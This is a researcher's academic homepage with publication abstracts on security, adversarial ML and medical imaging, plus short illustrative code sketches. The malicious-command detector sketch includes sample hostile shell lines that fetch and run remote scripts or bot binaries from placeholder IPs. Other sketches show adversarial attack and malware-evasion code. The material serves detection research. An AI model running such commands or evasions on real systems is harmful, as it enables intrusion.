Mohammed Abuhamad

I am an assistant professor of Computer Science at Loyola University Chicago. I received a Ph.D. degree in Computer Science from the University of Central Florida (UCF) in 2020. I also received a Ph.D. degree in Electrical and Computer Engineering from INHA University (Incheon, Republic of Korea) in 2020. I received a Master's degree in Information Technology (Artificial Intelligence) from the National University of Malaysia (Bangi, Malaysia) in 2013.

I am interested in AI/Deep-Learning-based Information Security, especially Software and Mobile/IoT Security. I am also interested in Machine Learning-based Applications and Adversarial Machine Learning. I have published several peer-reviewed research papers in top-tier conferences and journals such as ACM CCS, PoPETS, IEEE ICDCS, and IEEE IoT-J.

Research Lab: Cybersecurity Lab and AI for Secure Computing Research Lab (AISeC).
Teaching (Spring 2024): COMP 487: Deep Learning and COMP 458: Big Data Analytics.
Office Hours: Fridays 09:00 - 11:00 AM and Mondays 03:00 - 05:00 PM.

Information Security

We apply advances in machine learning to information and system security.

Software Security

We study methods for software authorship identification and vulnerability analysis.

Privacy

We study authorship anonymization and behavioral biometrics for authentication.

Robustness and Adversarial ML

We analyze the security properties of machine learning models.

Applied Machine Learning

We study and employ machine learning in various domains.

Malware Analysis

We utilize various characterizing features to build machine learning models to detect and analyze malware.

Research

To improve our understanding of systems and to guide security analytics towards secure systems design, I apply advances in deep learning to systems security. The emergence of such learning techniques promises various avenues for attribution in data-driven security analytics, and those techniques constitute the cornerstone of my current and future research interests. My contributions have focused on creating efficient and accurate methods for software security by building, customizing, optimizing, and leveraging deep learning techniques for security and privacy.

Information Security

Machine Learning

Software and IoT Security

Data Intelligence

Research Interests

We work on developing methods and algorithms to understand information from different sources and in different formats.

Information Security and Privacy

Our research focuses on building, customizing, optimizing, and leveraging machine learning techniques for creating efficient and accurate methods for information security and privacy.

We employ advances in the machine learning field to improve our understanding of systems and to guide security analytics towards secure systems design.

Our research interests include exploring the application space of AI in various areas, such as medical data and social network analysis.

Publications

Traditional one-time authentication mechanisms cannot authenticate smartphone users' identities throughout the session; behavioral biometrics captured by the built-in motion sensors and touch data are a candidate to solve this issue. Many studies have proposed solutions for behavioral-based continuous authentication; however, they are still far from practicality and generality for real-world usage. To date, no commercially deployed implicit user authentication scheme exists because most of those solutions were designed to improve detection accuracy without addressing real-world deployment requirements. To bridge this gap, we tackle the limitations of existing schemes and move toward developing a more practical implicit authentication scheme, dubbed MotionID, based on a one-class detector using behavioral data from motion sensors when users touch their smartphones. Compared with previous studies, our work addresses the following challenges: 1) Global mobile average to dynamically adjust the sampling rate for sensors on any device and mitigate the impact of using sensors' fixed sampling rates; 2) Over-all-apps to authenticate a user across all mobile applications, not only a specific application; 3) Single-device-evaluation to measure the performance with multiple users' (i.e., genuine users and impostors) data collected from the same device; 4) Rapid authentication to quickly identify users' identities using a few samples collected within short durations of touching (1–5 s) the device; 5) Unconditional settings to collect sensor data from real-world smartphone usage rather than a laboratory study. To show the feasibility of MotionID for those challenges, we evaluated the performance of MotionID with ten users' motion sensor data on five different smartphones under various settings. Our results show the impracticality of using a fixed sampling rate across devices, which most previous studies have adopted. MotionID is able to authenticate users with an F1-score of up to 98.5% for some devices under practical requirements and an F1-score of up to roughly 90% when considering concept drift and rapid authentication settings. Finally, we investigate time efficiency, power consumption, and memory usage considerations to examine the practicality of MotionID.
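As a rough illustration of the one-class detection idea behind MotionID, the sketch below trains a detector on the genuine user's motion-sensor windows only and then labels unseen windows as genuine or impostor. The featurization, the synthetic data, and the OneClassSVM choice are illustrative assumptions, not the paper's pipeline.

```python
# Minimal one-class authentication sketch: fit on genuine-user windows only.
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.svm import OneClassSVM

def featurize(window: np.ndarray) -> np.ndarray:
    """Summary statistics per sensor axis over one short touch window.

    `window` has shape (samples, axes), e.g., accelerometer + gyroscope.
    """
    return np.concatenate([window.mean(axis=0), window.std(axis=0),
                           window.min(axis=0), window.max(axis=0)])

# Genuine-user training windows (placeholder random data for illustration).
rng = np.random.default_rng(0)
train = np.stack([featurize(rng.normal(size=(100, 6))) for _ in range(200)])

scaler = StandardScaler().fit(train)
detector = OneClassSVM(kernel="rbf", nu=0.05).fit(scaler.transform(train))

# At authentication time: +1 = genuine, -1 = impostor.
probe = featurize(rng.normal(size=(100, 6)))
print(detector.predict(scaler.transform(probe.reshape(1, -1))))
```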
Deep Learning (DL) is rapidly maturing to the point that it can be used in safety- and security-critical applications, such as self-driving vehicles, surveillance, drones, and robots. However, adversarial samples, which are undetectable to the human eye, pose a serious threat that can cause the model to misbehave and compromise the performance of such applications. Addressing the robustness of DL models has become crucial to understanding and defending against adversarial attacks. In this study, we perform a series of experiments to examine the effect of adversarial attacks and defenses on various model architectures across well-known datasets. Our research focuses on black-box attacks such as SimBA, HopSkipJump, MGAAttack, and boundary attacks, as well as preprocessor-based defensive mechanisms, including bits squeezing, median smoothing, and the JPEG filter. Experimenting with various models, our results demonstrate that the level of noise needed for the attack increases as the number of layers increases. Moreover, the attack success rate decreases as the number of layers increases. This indicates that model complexity and robustness have a significant relationship. Investigating the diversity-robustness relationship, our experiments with diverse models show that having a large number of parameters does not imply higher robustness. Our experiments extend to show the effects of the training dataset on model robustness: various datasets, such as ImageNet-1000, CIFAR-100, and CIFAR-10, are used to evaluate the black-box attacks. Considering the multiple dimensions of our analysis, e.g., model complexity and training dataset, we examined the behavior of black-box attacks when models apply defenses. Our results show that applying defense strategies can significantly reduce attack effectiveness. This research provides in-depth analysis and insight into the robustness of DL models against various attacks and defenses.
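As a minimal sketch of the preprocessor-based defenses named above, the following applies bit squeezing and median smoothing to an input before classification; the parameter values are illustrative, not the settings used in the study.

```python
# Two preprocessor defenses applied to an image before it reaches a model.
import numpy as np
from scipy.ndimage import median_filter

def bit_depth_squeeze(img: np.ndarray, bits: int = 4) -> np.ndarray:
    """Reduce color depth to `bits` bits per channel (bit squeezing)."""
    levels = 2 ** bits - 1
    return np.round(img * levels) / levels  # img assumed in [0, 1]

def median_smooth(img: np.ndarray, size: int = 3) -> np.ndarray:
    """Median smoothing over a size x size spatial neighborhood."""
    return median_filter(img, size=(size, size, 1))  # H x W x C layout

x = np.random.rand(32, 32, 3)            # stand-in for an input image
x_defended = median_smooth(bit_depth_squeeze(x))
```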
Rapid advancements of deep learning are accelerating adoption in a wide variety of applications, including safety-critical applications such as self-driving vehicles, drones, robots, and surveillance systems. These advancements include applying variations of sophisticated techniques that improve the performance of models. However, such models are not immune to adversarial manipulations, which can cause the system to misbehave and remain unnoticed by experts. The frequency of modifications to existing deep learning models necessitates thorough analysis to determine the impact on models' robustness. In this work, we present an experimental evaluation of the effects of model modifications on deep learning model robustness using adversarial attacks. Our methodology involves examining the robustness of variations of models against various adversarial attacks. By conducting our experiments, we aim to shed light on the critical issue of maintaining the reliability and safety of deep learning models in safety- and security-critical applications. Our results indicate the pressing demand for an in-depth assessment of the effects of model changes on the robustness of models.
Deep learning methods have gained increasing attention in various applications due to their outstanding performance. To explore how this high performance relates to the proper use of data artifacts and the accurate formulation of a given task, interpretation models have become a crucial component in developing deep learning-based systems. Interpretation models enable understanding of the inner workings of deep learning models and offer a sense of security by detecting the misuse of artifacts in the input data. Like prediction models, interpretation models are also susceptible to adversarial inputs. This work introduces two attacks, AdvEdge and AdvEdge+, which deceive both the target deep learning model and the coupled interpretation model. We assess the effectiveness of the proposed attacks against four deep learning model architectures coupled with four interpretation models that represent different categories of interpretation models. Our experiments include the implementation of attacks using various attack frameworks. We also explore the attacks' resilience against three general defense mechanisms and potential countermeasures. Our analysis shows the effectiveness of our attacks in deceiving the deep learning models and their interpreters, and highlights insights to improve and circumvent the attacks.
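The following is a rough PGD-style sketch of the dual objective behind AdvEdge-type attacks: perturb the input to flip the classifier's decision while keeping the interpreter's output close to the benign interpretation. The `model` and `interpret` callables (the latter assumed differentiable), the loss weighting, and the step sizes are all assumptions for illustration.

```python
import torch

def dual_objective_attack(model, interpret, x, y, eps=0.03, steps=40,
                          step_size=0.005, lam=1.0):
    """Search for x' misclassified by `model` while `interpret(x')`
    stays close to the benign interpretation map."""
    base_map = interpret(x).detach()              # benign interpretation
    delta = torch.zeros_like(x, requires_grad=True)
    for _ in range(steps):
        logits = model(x + delta)
        # Descending this loss raises the classification loss (misclassify)
        # and lowers the interpretation drift (stay stealthy to the IDLS).
        loss = (-torch.nn.functional.cross_entropy(logits, y)
                + lam * torch.nn.functional.mse_loss(interpret(x + delta),
                                                     base_map))
        loss.backward()
        with torch.no_grad():
            delta -= step_size * delta.grad.sign()
            delta.clamp_(-eps, eps)               # keep perturbation bounded
        delta.grad.zero_()
    return (x + delta).detach()

# Toy usage with a linear model and a stand-in differentiable "saliency".
model = torch.nn.Sequential(torch.nn.Flatten(), torch.nn.Linear(3 * 8 * 8, 5))
interpret = lambda z: z.abs()
x, y = torch.rand(2, 3, 8, 8), torch.randint(0, 5, (2,))
x_adv = dual_objective_attack(model, interpret, x, y)
```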
Both CT and MRI images are acquired for HDR prostate brachytherapy patients at our institution. CT is used to identify catheters and MRI is used to segment the prostate. To address scenarios of limited MRI access, we developed a novel Generative Adversarial Network (GAN) to generate synthetic MRI (sMRI) from CT with sufficient soft-tissue contrast to provide accurate prostate segmentation without real MRI (rMRI).
Target and organ delineation during prostate high-dose-rate (HDR) brachytherapy treatment planning can be improved by acquiring both a postimplant CT and MRI. However, this leads to a longer treatment delivery workflow and may introduce uncertainties due to anatomical motion between scans. We investigated the dosimetric and workflow impact of MRI synthesized from CT for prostate HDR brachytherapy. Seventy-eight CT and T2-weighted MRI datasets from patients treated with prostate HDR brachytherapy at our institution were retrospectively collected to train and validate our deep-learning-based image-synthesis method. Synthetic MRI was assessed against real MRI using the dice similarity coefficient (DSC) between prostate contours drawn using both image sets. The DSC between the same observer's synthetic and real MRI prostate contours was compared with the DSC between two different observers’ real MRI prostate contours. New treatment plans were generated targeting the synthetic MRI-defined prostate and compared with the clinically delivered plans using target coverage and dose to critical organs. Variability between the same observer's prostate contours from synthetic and real MRI was not significantly different from the variability between different observer's prostate contours on real MRI. Synthetic MRI-planned target coverage was not significantly different from that of the clinically delivered plans. There were no increases above organ institutional dose constraints in the synthetic MRI plans.
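For reference, the dice similarity coefficient (DSC) used above compares two binary contours as DSC = 2|A ∩ B| / (|A| + |B|); a minimal sketch over toy segmentation masks:

```python
import numpy as np

def dice(a: np.ndarray, b: np.ndarray) -> float:
    """Dice similarity coefficient between two binary masks."""
    a, b = a.astype(bool), b.astype(bool)
    denom = a.sum() + b.sum()
    return 2.0 * np.logical_and(a, b).sum() / denom if denom else 1.0

# Two toy binary masks with partial overlap (9 shared pixels of 25 each).
m1 = np.zeros((10, 10), dtype=int); m1[2:7, 2:7] = 1
m2 = np.zeros((10, 10), dtype=int); m2[4:9, 4:9] = 1
print(round(dice(m1, m2), 3))   # 2*9 / (25+25) = 0.36
```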
With increased privacy concerns, anonymity tools such as VPNs and Tor have become popular. However, packet metadata such as the packet size and the number of packets can still be observed by an adversary. This is commonly known as fingerprinting, and website fingerprinting attacks have received a lot of attention recently because a known victim's website visits can be accurately predicted, deanonymizing that victim's web usage. Most of the previous work has been performed in laboratory settings under two assumptions: 1) a victim visits one website at a time, and 2) the whole website visit, with all the network packets, can be observed. To validate these assumptions, a new private web-browser extension called WebTracker is deployed with real users. WebTracker records the websites visited, when the website loading starts, and when the website loading finishes. Results show that users' browsing patterns differ from what was previously assumed. Users may browse the web in a way that acts as a countermeasure against website fingerprinting, as multiple websites overlap and download at the same time. Over 15% of websites overlap with at least one other website, and each overlap lasted 66 seconds. Moreover, each overlap happens roughly 9 seconds after the first website download has started. This reinforces previous findings that the beginning of a website download is more important than the end for a website fingerprinting attack.
By observing DNS traffic, an eavesdropper can easily identify the websites a user visits. To address this web-privacy concern, DNS lookups can be encrypted by performing them over HTTPS (DNS over HTTPS, or DoH). In this paper, we studied whether encrypted DoH traffic could be exploited to identify websites that a user has visited. This is a different type of website fingerprinting, analyzing encrypted DNS network traffic rather than the network traffic between the client and the web server. DNS typically uses fewer network packets than a website download. Our model and algorithm can accurately predict one out of 10,000 websites with 95% accuracy using the first 50 DoH packets. In the open-world environment with 100,000 websites, our model achieves an F1-score of 93%.
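A minimal sketch of this fingerprinting setup: represent each page load by its first 50 DoH packet sizes (signed by direction) and train an off-the-shelf classifier. The synthetic data and the random forest below are stand-ins, not the paper's model.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

N_PACKETS = 50
rng = np.random.default_rng(1)
# Each row: signed sizes of the first 50 DoH packets; label: website id.
X = rng.integers(-1500, 1500, size=(2000, N_PACKETS)).astype(float)
y = rng.integers(0, 10, size=2000)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(n_estimators=200, random_state=0).fit(X_tr, y_tr)
print("accuracy:", clf.score(X_te, y_te))   # near chance on random data
```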
This paper analyzes the reaction of social network users in terms of different aspects including sentiment analysis, topic detection, emotions, and the geo-temporal characteristics of our dataset. We show that the dominant sentiment reactions on social media are neutral, while the most discussed topics by social network users are about health issues. This paper examines the countries that attracted a higher number of posts and reactions from people, as well as the distribution of health-related topics discussed in the most mentioned countries. We shed light on the temporal shift of topics over countries. Our results show that posts from the top-mentioned countries influence and attract more reactions worldwide than posts from other parts of the world.
We have developed a PixCycleGAN framework to generate sMRI from CT with enhanced soft-tissue contrast at the boundary of the prostate for HDR treatment planning. In our study, the DSC and HD of the prostate contours on sMRI vs. rMRI agree within the inter-observer variability (IOV). In the future, we will evaluate the dosimetric impact of using sMRI in prostate segmentation for HDR treatment planning.
This work proposed W-Net, a CNN-based architecture with a small number of layers, to accurately classify the five WBC types. We evaluated W-Net on a real-world large-scale dataset and addressed several challenges such as the transfer learning property and the class imbalance. W-Net achieved an average classification accuracy of 97%. We synthesized a dataset of new WBC image samples using DCGAN, which we released to the public for education and research purposes.
This research utilizes various characterizing features extracted from each malware sample using static and dynamic analysis to build seven machine learning models that detect and analyze packed Windows malware. We use a large-scale dataset of over 107,000 samples covering unpacked and packed malware produced with ten different packers. We examined the performance of seven machine learning techniques using 50 dynamic and static features. Our results show that packed malware can circumvent detection when a single analysis is performed, while applying both static and dynamic methods improves detection accuracy by around 2% to 3%.
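A minimal sketch of the combined pipeline, assuming static and dynamic feature vectors are concatenated per sample and compared across several off-the-shelf models (placeholder data; the study uses 50 real features and seven techniques):

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(2)
static_feats = rng.random((500, 25))    # e.g., header/section statistics
dynamic_feats = rng.random((500, 25))   # e.g., API-call behavior counts
X = np.hstack([static_feats, dynamic_feats])
y = rng.integers(0, 2, size=500)        # 0 = benign, 1 = malicious

for name, model in [("RF", RandomForestClassifier(random_state=0)),
                    ("GB", GradientBoostingClassifier(random_state=0)),
                    ("LR", LogisticRegression(max_iter=1000))]:
    print(name, cross_val_score(model, X, y, cv=5).mean())
```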
Deep neural network models are susceptible to malicious manipulations even in black-box settings. Providing explanations for DNN models offers a sense of security through human involvement, which can reveal whether a sample is benign or adversarial even when previous attacks achieved a high success rate. However, interpretable deep learning systems (IDLSes) are shown to be susceptible to adversarial manipulations in white-box settings. Attacking IDLSes in black-box settings is challenging and remains an open research domain. In this work, we propose a black-box version of the white-box AdvEdge approach against IDLSes, which is query-efficient and gradient-free, without requiring any knowledge of the target DNN model and its coupled interpreter. Our approach takes advantage of transfer-based and score-based techniques using the effective microbial genetic algorithm (MGA). We achieve a high attack success rate with a small number of queries and high similarity in interpretations between adversarial and benign samples.
The rapid pace of malware development and the widespread use of code obfuscation, polymorphism, and morphing techniques pose a considerable challenge to detecting and analyzing malware. Today, it is difficult for antivirus applications to detect morphing malware using traditional signature-based methods; structural, graph-based detection methods have emerged as a promising way to address this challenge. In this work, we propose a method for detecting malware using graphs' spectral heat and wave signatures, which are efficient and size- and permutation-invariant. We extracted heat and wave representations of sizes 250 and 1,000, and we trained and tested them on eight machine learning classifiers. We used a dataset of 37,537 unpacked Windows malware executables and extracted the control flow graph (CFG) of each sample to obtain the spectral representations. Our experimental results show that, using heat and wave spectral graph signatures, the best malware analysis accuracy reached 95.9%.
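A minimal sketch of a heat-style spectral signature, assuming a generic heat-kernel-signature construction: eigendecompose the graph Laplacian, weight eigenvector energy by exp(-λt), and pool per-node values into a permutation-invariant histogram. This is not the paper's exact descriptor.

```python
import numpy as np
import networkx as nx

def heat_signature(G: nx.Graph, times, bins: int = 16) -> np.ndarray:
    """Fixed-size, permutation-invariant heat descriptor of a graph."""
    L = nx.laplacian_matrix(G).toarray().astype(float)
    lam, phi = np.linalg.eigh(L)                    # Laplacian eigenpairs
    sigs = []
    for t in times:
        hks = (np.exp(-lam * t) * phi ** 2).sum(axis=1)  # HKS per node
        hist, _ = np.histogram(hks, bins=bins)      # pooling: order-invariant
        sigs.append(hist / max(hist.sum(), 1))
    return np.concatenate(sigs)

G = nx.erdos_renyi_graph(40, 0.1, seed=3)           # stand-in for a CFG
print(heat_signature(G, times=[0.1, 1.0, 10.0]).shape)   # (48,)
```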
There is an increasing demand for comprehensive and in-depth analysis of the behaviors of various attacks and the possible defenses for common deep learning models under several adversarial scenarios. In this study, we conducted four separate investigations. First, we examine the relationship between a model's complexity and its robustness against the studied attacks. Second, we examine the connection between the performance and diversity of models. Third, the first and second experiments are repeated across different datasets to explore the impact of the dataset on model performance. Fourth, model behavior under the defense strategies is extensively investigated.
In this article, we survey more than 140 recent behavioral biometric-based approaches for continuous user authentication, including motion-based methods (28 studies), gait-based methods (19 studies), keystroke dynamics-based methods (20 studies), touch gesture-based methods (29 studies), voice-based methods (16 studies), and multimodal-based methods (34 studies). The survey provides an overview of the current state-of-the-art approaches for continuous user authentication using behavioral biometrics captured by smartphones’ embedded sensors, including insights and open challenges for adoption, usability, and performance.
For high-dose-rate (HDR) prostate brachytherapy at our institution, both CT and MRI are acquired to identify catheters and delineate the prostate, respectively. We propose to build a deep-learning model to generate synthetic magnetic resonance imaging (sMRI) with enhanced soft-tissue contrast from computed tomography (CT) scans. sMRI would help physicians accurately delineate the prostate without needing to acquire an additional planning MRI. 58 paired post-implant CT and T2-weighted MRI sets acquired on the same day for HDR prostate patients were retrospectively curated to train and validate the conditional Generative Adversarial Network (cGAN) algorithm Pix2Pix to generate sMRI.
In this paper, we investigate the exposure of young viewers to inappropriate comments posted on YouTube videos targeting this demographic. We collected a large-scale dataset of approximately four million records and studied the presence of five age-inappropriate categories and the amount of exposure to each category. Using natural language processing and machine learning techniques, we constructed ensemble classifiers that achieved high accuracy in detecting inappropriate comments. Our results show a large percentage of worrisome comments with inappropriate content: we found 11% of the comments on children's videos to be toxic, highlighting the importance of monitoring comments, particularly on children's platforms.
In this work, we provide a first look at the tasks managed by shell commands in Linux-based IoT malware toward detection. We analyze malicious shell commands found in IoT malware and build a neural network-based model, ShellCore, to detect malicious shell commands. Namely, we collected a large dataset of shell commands, including malicious commands extracted from 2,891 IoT malware samples and benign commands collected from real-world network traffic analysis and volunteered data from Linux users. Using conventional machine learning and deep learning-based approaches trained with term- and character-level features, ShellCore is shown to achieve an accuracy of more than 99% in detecting malicious shell commands and files (i.e., binaries).
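A minimal sketch of character-level modeling of shell commands in the spirit of ShellCore's features, with tiny illustrative commands and labels (the real model and dataset are far larger):

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

commands = [
    "wget http://198.51.100.7/x.sh -O /tmp/x.sh; sh /tmp/x.sh",   # malicious-like
    "busybox tftp -g -r bot.mips 203.0.113.9; chmod 777 bot.mips",
    "ls -la /var/log",                                            # benign
    "tar -czf backup.tar.gz /home/user/docs",
]
labels = [1, 1, 0, 0]

clf = make_pipeline(
    TfidfVectorizer(analyzer="char", ngram_range=(2, 4)),  # char n-grams
    LogisticRegression(max_iter=1000),
)
clf.fit(commands, labels)
print(clf.predict(["curl http://203.0.113.9/payload | sh"]))
```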
This study proposes a malware detection system robust to adversarial attacks. We examine the performance of state-of-the-art methods against adversarial IoT software crafted using graph embedding and augmentation techniques; namely, we study the robustness of such methods against two black-box adversarial methods, GEA and SGEA, which generate Adversarial Examples (AEs) with reduced overhead while keeping their practicality intact. Our comprehensive experimentation with GEA-based AEs shows the relation between misclassification and the graph size of the injected sample. Upon optimization and with small perturbation, using SGEA, all IoT malware samples are misclassified as benign. This highlights the vulnerability of current detection systems under adversarial settings. Given the landscape of possible adversarial attacks, we then propose DL-FHMC, a fine-grained hierarchical learning approach for malware detection and classification that is robust to AEs, with a capability to detect 88.52% of the malicious AEs.
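A minimal sketch of the graph-injection idea behind GEA/SGEA, assuming a benign subgraph is wired into a malware CFG from its entry node so that graph-level features drift toward the benign class; the node choices and wiring are illustrative, not the papers' exact procedure.

```python
import networkx as nx

def inject_subgraph(malware_cfg: nx.DiGraph, benign_sub: nx.DiGraph) -> nx.DiGraph:
    """Embed a benign subgraph into a malware CFG via a single edge."""
    combined = nx.union(malware_cfg, benign_sub, rename=("m-", "b-"))
    entry, sub_entry = "m-0", "b-0"        # assumed entry nodes (illustrative)
    combined.add_edge(entry, sub_entry)    # wire the injected part in
    return combined

mal = nx.gnp_random_graph(20, 0.15, seed=6, directed=True)
ben = nx.gnp_random_graph(7, 0.3, seed=7, directed=True)   # ~6.8 nodes avg in SGEA
print(inject_subgraph(mal, ben).number_of_nodes())          # 27
```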
This work proposes a deep learning-based approach for software authorship attribution that facilitates large-scale, format-independent, language-oblivious, and obfuscation-resilient software authorship identification. The proposed approach learns deep authorship attribution using a recurrent neural network and employs an ensemble random forest classifier for scalability to de-anonymize programmers.
Utilizing interpretation models enables a better understanding of how DNN models work, and offers a sense of security. However, interpretations are also vulnerable to malicious manipulation. We present AdvEdge and AdvEdge+, two attacks to mislead the target DNNs and deceive their combined interpretation models. We evaluate the proposed attacks against two DNN model architectures coupled with four representatives of different categories of interpretation models. The experimental results demonstrate our attacks’ effectiveness in deceiving the DNN models and their interpreters.
Machine Learning (ML) based Network Intrusion Detection Systems (NIDSs) operate on flow features obtained from flow-exporting protocols (e.g., NetFlow). Recent ML and Deep Learning (DL) based NIDS solutions assume that such flow information (e.g., average packet size) is obtained from all packets of the flow. However, in practice the flow exporter is often deployed on commodity devices where packet sampling is inevitable. As a result, the applicability of such ML-based NIDS solutions in the presence of sampling (i.e., when flow information is obtained from a sampled set of packets instead of the full traffic) is an open question. In this study, we explore the impact of packet sampling on the performance and efficiency of ML-based NIDSs. Unlike previous work, our proposed evaluation procedure is immune to different settings of the flow-export stage; hence, it can provide a robust evaluation of NIDSs even in the presence of sampling. Through sampling experiments, we established that malicious flows with shorter size (i.e., fewer packets) are likely to go unnoticed even with mild sampling rates such as 1/10 and 1/100. Next, using the proposed evaluation procedure, we investigated the impact of various sampling techniques on the NIDS detection rate and false alarm rate. Detection rate and false alarm rate are computed for three sampling rates (1/10, 1/100, 1/1000), four different sampling techniques, and three classifiers (two tree-based, one deep learning based). Experimental results show that the systematic linear sampler SketchFlow performs better than non-linear samplers such as Sketch Guided and Fast Filtered sampling. We also found that the random forest classifier with SketchFlow sampling was a better combination, showing a higher detection rate and lower false alarm rate across multiple sampling rates compared to other sampler-classifier combinations. Our results are consistent across multiple sampling rates, with an exceptional case observed for Sketch Guided sampling.
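A minimal sketch of why sampling distorts flow features: the same flow yields different statistics, or disappears entirely, once packets are sampled. The 1/10 systematic and 1/10 random samples below are simplifications of the samplers studied.

```python
import numpy as np

def flow_features(pkt_sizes: np.ndarray) -> dict:
    """Toy flow features; a flow can vanish entirely after sampling."""
    if pkt_sizes.size == 0:
        return {"pkts": 0, "avg_size": None}
    return {"pkts": int(pkt_sizes.size), "avg_size": float(pkt_sizes.mean())}

rng = np.random.default_rng(4)
flow = rng.integers(40, 1500, size=23)          # a short 23-packet flow

full = flow_features(flow)
systematic = flow_features(flow[::10])          # 1/10 systematic sampling
random_sample = flow_features(flow[rng.random(flow.size) < 0.1])

print(full, systematic, random_sample)
```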
In this article, we propose AUToSen, a deep-learning-based active authentication approach that exploits sensors in consumer-grade smartphones to authenticate a user. Unlike conventional approaches, AUToSen is based on deep learning to identify a user's distinct behavior from the embedded sensors, with and without the user's interaction with the smartphone. We investigate different deep learning architectures for modeling and capturing users' behavioral patterns for the purpose of authentication. Moreover, we explore the sufficiency of sensory data required to accurately authenticate users. We evaluate AUToSen on a real-world dataset that includes sensor data from 84 participants' smartphones collected using our designed data-collection application.
In this paper, we systematically tackle the problem of adversarial example detection in control flow graph (CFG) based classifiers for malware detection using Soteria. Unique to Soteria, we use both density-based and level-based labels for CFG labeling to yield a consistent representation, a random walk-based traversal approach for feature extraction, and an n-gram-based module for feature representation. End-to-end, Soteria's representation ensures a simple yet powerful randomization property of the classification features, making it difficult even for a powerful adversary to launch a successful attack. Soteria also employs a deep learning approach consisting of an auto-encoder for detecting adversarial examples and a CNN architecture for detecting and classifying malware samples.
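A minimal sketch of random-walk traversal with n-gram counting over a labeled CFG; the node labeling below is a simple degree-based stand-in for Soteria's density- and level-based labels.

```python
import random
from collections import Counter
import networkx as nx

def random_walk_ngrams(G: nx.DiGraph, walks=50, length=8, n=3, seed=5):
    """Count label n-grams observed along random walks of the graph."""
    rng = random.Random(seed)
    label = {v: str(G.degree(v)) for v in G}    # stand-in node labeling
    counts, nodes = Counter(), list(G)
    for _ in range(walks):
        v = rng.choice(nodes)
        seq = [label[v]]
        for _ in range(length - 1):
            nbrs = list(G.successors(v))
            if not nbrs:
                break
            v = rng.choice(nbrs)
            seq.append(label[v])
        for i in range(len(seq) - n + 1):
            counts["-".join(seq[i:i + n])] += 1
    return counts

G = nx.gnp_random_graph(30, 0.1, seed=5, directed=True)  # stand-in CFG
print(random_walk_ngrams(G).most_common(5))
```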
Most authorship identification schemes assume that code samples are written by a single author. However, real software projects are typically the result of a team effort, making it essential to consider a fine-grained multi-author identification in a single code sample, which we address with Multi-χ. Multi-χ leverages a deep learning-based approach for multi-author identification in source code, is lightweight, uses a compact representation for efficiency, and does not require any code parsing, syntax tree extraction, nor feature selection.
In this work, we explore the ecosystem of proxies by understanding their affinities and distributions comparatively. We compare residential and open proxies in various ways, including country-level and city-level analyses that highlight their geospatial distributions, similarities, and differences, and we check them against a large number of blacklists and the categories therein (i.e., spam and maliciousness analysis) to understand their characteristics and attributes.
In this study, we investigate the correlation of different toxic behaviors, such as identity hate and obscenity, with different news topics. To do that, we collected a large-scale dataset of approximately 7.3 million comments and more than 10,000 news video captions. We utilized deep learning-based techniques to construct an ensemble of classifiers, tested on a manually labeled dataset for label prediction, that achieved high accuracy and uncovered a large number of toxic comments on news videos across 15 topics obtained using Latent Dirichlet Allocation (LDA) over the captions of the news videos. Our analysis shows that religion- and crime-related news have the highest rate of toxic comments, while economy-related news has the lowest rate. We highlight the necessity of effective tools to address topic-driven toxicity impacting interactions and public discourse on the platform.
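A minimal sketch of the topic-extraction step, assuming LDA over caption text as described above (toy captions and three topics instead of the 15 used in the study):

```python
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.feature_extraction.text import CountVectorizer

captions = [
    "senate passes new economy bill amid market concerns",
    "police investigate downtown robbery crime report",
    "church leaders gather for interfaith religion summit",
    "stocks rally as economy shows strong jobs growth",
]
vec = CountVectorizer(stop_words="english")
X = vec.fit_transform(captions)

lda = LatentDirichletAllocation(n_components=3, random_state=0).fit(X)
terms = vec.get_feature_names_out()
for k, topic in enumerate(lda.components_):
    top = topic.argsort()[-4:][::-1]         # strongest words per topic
    print(f"topic {k}:", ", ".join(terms[i] for i in top))
```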
This work aims to model seven spatio-temporal behavioral characteristics of DDoS attacks, including the attack magnitude, the adversaries' botnet information, and the attack's source locality down to the organization level. We leverage four state-of-the-art deep learning methods to construct an ensemble of models to capture and predict behavioral patterns of the attack. The proposed ensemble operates at two frequencies, hourly and daily, to actively model and predict the attack behavior and involvement and to oversee the effect of implementing a defense mechanism.
In this study, we focus on understanding the shift in the behavior of Twitter users, a major social media platform used by millions daily to share thoughts and discussions. In particular, we collected 26 million tweets over a period of seven months: three months before the pandemic outbreak and four months after. Using topic modeling and state-of-the-art deep learning techniques, we analyzed the trending topics within the tweets on a monthly basis, including their sentiment and users' perception. This study highlights the change in public behavior and concerns during the pandemic. Users expressed their concerns about health services, with a 59.24% increase in engagement, and the economic effects of the pandemic (a 34.43% increase). Topics such as online shopping saw a remarkable increase in popularity, perhaps due to social distancing, while crime and sports topics witnessed a decrease.
This work proposes a convolutional neural network (CNN) based code authorship identification system. Our proposed system exploits term frequency-inverse document frequency, word embedding modeling, and feature learning techniques for code representation. This representation is then fed into a CNN-based code authorship identification model to identify the code’s author.
The purpose of this research is to introduce a language model adaptation approach that combines both categories (data selection and weighting criterion) of language model adaptation. This approach applies data selection for task-specific translation by dividing the corpus into smaller, topic-related corpora using a clustering process. We investigate the effect of different approaches to clustering the bilingual data on the language model adaptation process in terms of translation quality, using the Europarl WMT07 corpus, which includes bilingual data for English-Spanish, English-German, and English-French.
In this study, we investigate the robustness of such models against adversarial attacks. Our approach crafts adversarial IoT software using the Subgraph Embedding and Augmentation (SGEA) method, which reduces the embedded size required to cause misclassification. Intensive experiments are conducted to evaluate the performance of the proposed method. We observed that the SGEA approach is able to misclassify all IoT malware samples as benign by embedding subgraphs of 6.8 nodes on average. This highlights that current detection systems are prone to adversarial example attacks; thus, there is a need to build more robust systems to detect the manipulated features generated by adversarial examples.
This work proposes W-Net, a CNN-based method for WBC classification. We evaluate W-Net on a real-world large-scale dataset, obtained from The Catholic University of Korea, that includes 6,562 real images of the five WBC types. W-Net achieves an average accuracy of 97%.
